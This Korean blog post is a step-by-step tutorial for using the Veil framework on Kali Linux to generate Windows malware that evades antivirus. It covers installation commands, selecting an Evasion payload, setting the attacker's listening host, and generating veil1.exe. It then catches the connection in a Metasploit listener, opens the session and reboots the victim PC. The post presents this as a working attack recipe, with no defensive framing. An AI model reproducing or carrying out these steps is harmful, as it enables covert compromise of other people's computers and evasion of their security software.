메타스폴로잇으로 만든 악성코드는 백신프로그램에 탐지가 된다.

 

veil라는 악성코드 만드는 프로그램은 우회를 해서 백신에 걸리지 않는다.

 

Veil-Evasion, Veil-Ordnance,Veil-Catapult,PowerTools,Veil-Pillage

 

★Veil-Evasion

- 바이러스 백신을 우회해 악성코드를 제작

 

★Veil-Ordnance

- 엠파이어 와 비슷

- 실행하여 간단한 과정을 통해 인코딩된 쉘코드를 생성

 

 

★Veil-Catapult

- 피해자의 악성코드를 배달할때

- 침투된 대상 시스템에 페이로드를 전달하고 실행

 

 

★Veil-Pillage

- 원하는 기능의 모듈을 선택하여 다양한 형태의 페이로드를 제작할 있다. 또한 공격하는 과정에서 다른 공격용 도구로 대체하거나 소스코드를 수정하여 연동이 가능하기 때문에 더욱 강력한 도구

 

★PowerTools

- 공격형 도구들이 묶여있는 곳

 

Veil 설치

터미널창 git clone https://github.com/Veil-Framework/Veil.git

 

★Veil 다운하는게 많기도하고 칼리가 램이 부족해서인지 느려서 빠르게 만들어 볼거다.

 

터미널창

leafpad /etc/apt/sources.list 에 들어가서 밑에 소스 붙어넣기

deb http://kali.cs.nctu.edu.tw/kali kali-rolling main non-free contrib

 

 

setup 폴더에 들어가서 ./setup.sh -c 를 실행해 설치한다. 안하면 Veil이 작동을 안한다.

-c = clone veil framework repos

-u = update veil framework repos

 

 

설치를 다 완료한다.

 

 

Veil 파일에 ./Veil.py를 실행하고

main menu choice에 use Evasion 실행.

 

 

use 28 실행

set lhost (자신 아이피) 실행

generate 실행

 

 

rc파일 경로 저장한후 새터미널 msfconsole -r(경로) 파일 위치 실행

veil1.exe 가 백신우회된 악성코드다.

 

 

내가 만든 악성코드에 msfconsole로 접속한후 pc윈도우에서 veil1.exe 접속

 

 

 

메타스폴로잇으로 만든 악성코드 발견 감지

 

 

누가 들어왔는지 세션이 검색 되었다.

 

sessions -i 1

 

reboot 하면 상대 pc 재부팅.

+ Recent posts